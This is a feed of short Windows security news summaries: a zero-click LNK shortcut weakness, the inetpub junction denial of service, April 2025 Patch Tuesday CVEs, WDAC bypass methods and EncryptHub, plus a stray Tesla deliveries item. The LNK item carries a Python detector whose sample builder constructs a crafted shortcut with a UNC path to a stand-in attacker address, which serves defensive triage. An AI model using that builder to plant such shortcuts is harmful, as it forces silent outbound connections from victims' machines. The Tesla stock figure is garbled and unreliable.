security feature

Winsage
April 30, 2025
Security researcher Nafiez has disclosed a weakness in Windows LNK (shortcut) files that requires no user interaction: simply browsing to a folder that contains a crafted shortcut makes Windows initiate a silent outbound network connection to an attacker-controlled host. Microsoft has declined to fix it, stating that the report does not meet its security servicing criteria. The technique combines three elements of the LNK format: setting the HasArguments flag in the link header, adding an EnvironmentVariableDataBlock in the ExtraData section, and placing a UNC path (\\server\share) in that block so that Explorer resolves the target over the network while rendering the folder. Microsoft argues that the Mark of the Web (MOTW) provides adequate protection, although security researchers question whether MOTW is relevant to a shortcut that fires on folder view rather than on execution. Microsoft has patched earlier LNK flaws, and with proof-of-concept code now public there is concern that attackers will adopt the technique.
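To make the mechanism concrete, the following added example (not code from the article or from the researcher) parses the on-disk Shell Link layout from MS-SHLLINK and flags shortcuts whose EnvironmentVariableDataBlock points at a UNC path while the HasArguments flag is set. The LNK samples it scans are constructed in the block itself with a small builder, so it runs offline; the detection heuristic is an assumption derived from the description above, not a published signature, and the 203.0.113.7 address is a documentation address used as a stand-in for an attacker host.

```python
import struct
from pathlib import Path

# Shell Link header layout from MS-SHLLINK: 0x4C bytes, CLSID 00021401-0000-0000-C000-000000000046.
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits used here.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80

# StringData fields appear in this fixed order, each present only if its flag is set.
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location")]

# EnvironmentVariableDataBlock: BlockSize 0x314, signature 0xA0000001,
# body = 260-byte ANSI target + 520-byte UTF-16LE target.
ENV_BLOCK_SIG, ENV_BLOCK_SIZE = 0xA0000001, 0x314


def parse_lnk(data: bytes):
    """Return (LinkFlags, StringData dict, {signature: ExtraData body}) for a .lnk."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:            # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                      # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    strings = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, no terminator
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + width * count]
        strings[name] = raw.decode("utf-16-le" if width == 2 else "latin-1")
        off += width * count
    blocks = {}
    while off + 4 <= len(data):                    # ExtraData until TerminalBlock (size < 4)
        size = struct.unpack_from("<I", data, off)[0]
        if size < 4:
            break
        sig = struct.unpack_from("<I", data, off + 4)[0]
        blocks[sig] = data[off + 8:off + size]
        off += size
    return flags, strings, blocks


def env_block_target(body: bytes) -> str:
    """Target path from an EnvironmentVariableDataBlock body (Unicode field preferred)."""
    ansi = body[:260].split(b"\0", 1)[0].decode("latin-1")
    uni = body[260:780].decode("utf-16-le", "replace").split("\0", 1)[0]
    return uni or ansi


def scan_lnk(data: bytes) -> list:
    """Heuristic (assumption): UNC target in the environment block, plus HasArguments set."""
    flags, strings, blocks = parse_lnk(data)
    findings = []
    body = blocks.get(ENV_BLOCK_SIG)
    if body is not None and len(body) >= 780:
        target = env_block_target(body)
        if target.startswith("\\\\"):
            findings.append(f"EnvironmentVariableDataBlock target is a UNC path: {target}")
            if flags & HAS_ARGUMENTS:
                findings.append(f"HasArguments set (arguments={strings.get('arguments')!r})")
    return findings


def scan_folder(folder: str) -> dict:
    """Scan every *.lnk in a folder, as Explorer would touch them on folder view."""
    return {p.name: scan_lnk(p.read_bytes()) for p in Path(folder).glob("*.lnk")}


def build_lnk(flags: int, strings: dict = None, env_target: str = None) -> bytes:
    """Constructed sample builder (not a real-world file): header, StringData, ExtraData."""
    strings = strings or {}
    out = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags | IS_UNICODE,
                      0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    for bit, name in STRING_FIELDS:
        if flags & bit:
            s = strings.get(name, "")
            out += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    if env_target is not None:
        out += struct.pack("<II", ENV_BLOCK_SIZE, ENV_BLOCK_SIG)
        out += env_target.encode("latin-1").ljust(260, b"\0")
        out += env_target.encode("utf-16-le").ljust(520, b"\0")
    return out + struct.pack("<I", 0)             # TerminalBlock


if __name__ == "__main__":
    benign = build_lnk(HAS_WORKING_DIR, {"working_dir": "C:\\Tools"},
                       env_target="%SystemRoot%\\notepad.exe")
    crafted = build_lnk(HAS_ARGUMENTS, {"arguments": ""},
                        env_target="\\\\203.0.113.7\\share\\x")
    for label, sample in (("benign", benign), ("crafted", crafted)):
        print(label, scan_lnk(sample) or "clean")
```

Pointing `scan_folder` at a download directory gives a quick triage of shortcuts before anyone opens the folder in Explorer; the parser walks the optional LinkTargetIDList and LinkInfo structures only by their size fields, so it does not need to understand their contents to reach the ExtraData section.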
Winsage
April 27, 2025
Microsoft's recent Windows security update has raised concerns because it introduces a new weakness while fixing an old one. The update, which addresses CVE-2025-21204, creates an empty C:\inetpub folder that Microsoft says is part of the fix and should not be removed. Security researcher Kevin Beaumont has warned that this creates a denial-of-service condition: a non-admin user can pre-create inetpub as a symlink or junction, after which future Windows security updates fail to install. Microsoft classified the issue as moderate severity and advised deleting the inetpub symlink and retrying the update. The report has been forwarded to the Windows security team for possible further action.
Winsage
April 20, 2025
Microsoft has reported a record 1,360 security vulnerabilities across its products in 2024, an 11% increase over 2023. The total includes 587 vulnerabilities in Windows (33 rated critical) and 684 in Windows Server (43 rated critical). The rising count suggests that security researchers are effectively finding weaknesses, and Microsoft has paid over a million dollars in bug bounties to encourage that work. The predictable disclosure and remediation cycle of Patch Tuesday improves overall security and indicates that Microsoft is actively addressing vulnerabilities rather than being indifferent to user security.
Winsage
April 19, 2025
Microsoft has announced the deprecation of Virtualization-based Security (VBS) enclaves, a feature introduced in July 2024, on Windows 11 23H2 and earlier and on Windows Server 2022 and its predecessors. Support continues on Windows 11 24H2, Windows Server 2025 and later versions. VBS enclaves use Microsoft's Hyper-V hypervisor to carve out isolated memory regions for sensitive application components. The decision may be driven by the rapid Windows 11 release cycle, and users are expected to move to newer releases as support for Windows 11 23H2 ends in November. Enterprise customers that depend on VBS enclaves on the older versions may face disruption if the feature is removed entirely.
Winsage
April 18, 2025
Microsoft is deprecating support for Virtualization-Based Security (VBS) enclaves on Windows 11 23H2 and earlier as it moves users to Windows 11 24H2, which retains VBS enclave support. Windows 11 24H2 carries the current security baseline, and developers need to target it to ensure their applications function correctly and securely. Windows 11 23H2 reaches end of support on November 11, 2025, after which Microsoft will stop providing security updates. Users are encouraged to upgrade to Windows 11 24H2 to keep access to security features and receive updates.
Tech Optimizer
April 16, 2025
Windows Defender Application Control (WDAC) is a built-in Windows security feature that restricts execution to trusted, allow-listed applications. Attackers have found multiple ways around it, exposing systems to malware. Bypass techniques include abusing Living-off-the-Land Binaries (LOLBins) that are already trusted by policy, DLL sideloading into trusted processes, and exploiting misconfigured WDAC policies. Code run this way can evade traditional security tooling, allowing attackers to deploy ransomware or install backdoors. Microsoft runs a bug bounty program for WDAC bypasses, but some techniques remain unpatched for long periods. Users can reduce risk by keeping Windows updated, being cautious with software downloads, and running reputable antivirus software.
Winsage
April 13, 2025
Microsoft addressed over 120 vulnerabilities in its April 2025 Patch Tuesday release, including an actively exploited zero-day (CVE-2025-29824). WinRAR users are urged to update to version 7.11 to fix CVE-2025-31334, which lets attackers bypass Windows' Mark of the Web protection. Chief Information Security Officers (CISOs) report security platform fatigue from the proliferation of overlapping security tools. President Donald Trump signed an Executive Order revoking the security clearances of Chris Krebs and of SentinelOne employees. Cyber crisis simulations are becoming essential for organizational preparedness against evolving threats. Fortinet released patches for several vulnerabilities, including a critical flaw (CVE-2024-48887) in FortiSwitch appliances. WhatsApp users should update their Windows client to fix CVE-2025-30401, which could allow malicious code execution. Kevin Serafin, CISO at Ecolab, discussed aligning security initiatives with business objectives. Attacks involving compromised large language models (LLMs) are on the rise, along with risks tied to AI autonomy. New open-source tools such as the YES3 Scanner and APTRS have been released to extend security capabilities. The cybersecurity job market remains strong, with increasing demand for skilled professionals.
Winsage
April 9, 2025
Microsoft's Patch Tuesday updates addressed over 120 vulnerabilities, including one actively exploited flaw (CVE-2025-29824) and 11 critical issues. CVE-2025-29824 is an elevation-of-privilege vulnerability in the Windows Common Log File System (CLFS) driver: a use-after-free with a CVSS score of 7.8 that lets a local attacker escalate privileges. The group Storm-2460 has used it to deploy the PipeMagic ransomware against victims in the US, Spain, Venezuela, and Saudi Arabia. Patches for Windows Server and Windows 11 have shipped, but Windows 10 users are still waiting, with Microsoft promising an update soon. Every critical vulnerability in this release is a remote code execution (RCE) flaw. Notable vulnerabilities include:
- CVE-2025-26670: LDAP Client RCE, Critical, CVSS 8.1
- CVE-2025-27752: Microsoft Excel RCE, Critical, CVSS 7.8
- CVE-2025-29791: Microsoft Excel RCE, Critical, CVSS 7.8
- CVE-2025-27745: Microsoft Office RCE, Critical, CVSS 7.8
- CVE-2025-27748: Microsoft Office RCE, Critical, CVSS 7.8
- CVE-2025-27749: Microsoft Office RCE, Critical, CVSS 7.8
- CVE-2025-27491: Windows Hyper-V RCE, Critical, CVSS 7.1
- CVE-2025-26663: Windows LDAP RCE, Critical, CVSS 8.1
- CVE-2025-27480: Windows RDP RCE, Critical, CVSS 8.1
- CVE-2025-27482: Windows RDP RCE, Critical, CVSS 8.1
- CVE-2025-26686: Windows TCP/IP RCE, Critical, CVSS 7.5
- CVE-2025-29809: Windows Kerberos Security Feature Bypass, Important, CVSS 7.1
Dustin Childs of ZDI noted that CVE-2025-29809 requires additional configuration steps beyond installing the patch. CVE-2025-26663 and CVE-2025-26670 are considered wormable, so prompt patching is essential, especially where LDAP services are exposed to the network. Adobe released over 50 fixes for products including ColdFusion, After Effects, and Photoshop, with some ColdFusion issues rated critical. AMD updated advisories on GPU access and several Ryzen AI software vulnerabilities.
Winsage
April 8, 2025
A threat actor known as EncryptHub, or SkorikARI, has been credited by Microsoft with reporting two security vulnerabilities in Windows: a high-severity Mark of the Web bypass (CVE-2025-24061) and a medium-severity spoofing issue in Windows File Explorer (CVE-2025-24071). EncryptHub, of Ukrainian origin and based in Romania, has a background in vishing and ransomware attacks and shifted toward vulnerability research under financial pressure and the threat of imprisonment. The KrakenLabs report acknowledges EncryptHub's skill at finding vulnerabilities but notes that his tooling is not foolproof, and that users following basic security practices are likely to remain safe.
AppWizard
April 3, 2025
Wedbush analyst Dan Ives reported that Tesla delivered 336,681 vehicles in Q1 2025, falling short of Wall Street's forecast of 352,000 and whisper estimates around 350,000. Tesla attributed part of this underperformance to several weeks of production loss while ramping up the new Model Y. Ives described the performance as “a disaster on every metric” and emphasized that it represents a pivotal moment for CEO Elon Musk, who has been increasingly involved in U.S. government affairs, potentially affecting the brand negatively. Following the delivery report, Tesla's stock initially dropped over 5 percent but rebounded by 8 percent, currently trading up over 5 percent at 3.01. This recovery was linked to reports of Musk potentially stepping back from his role in the Department of Government Efficiency (DOGE). Ives expressed optimism about Tesla's future advancements in robotaxi technology and Full Self-Driving capabilities but cautioned that Musk needs to balance his responsibilities with DOGE and leading Tesla to avoid further crises.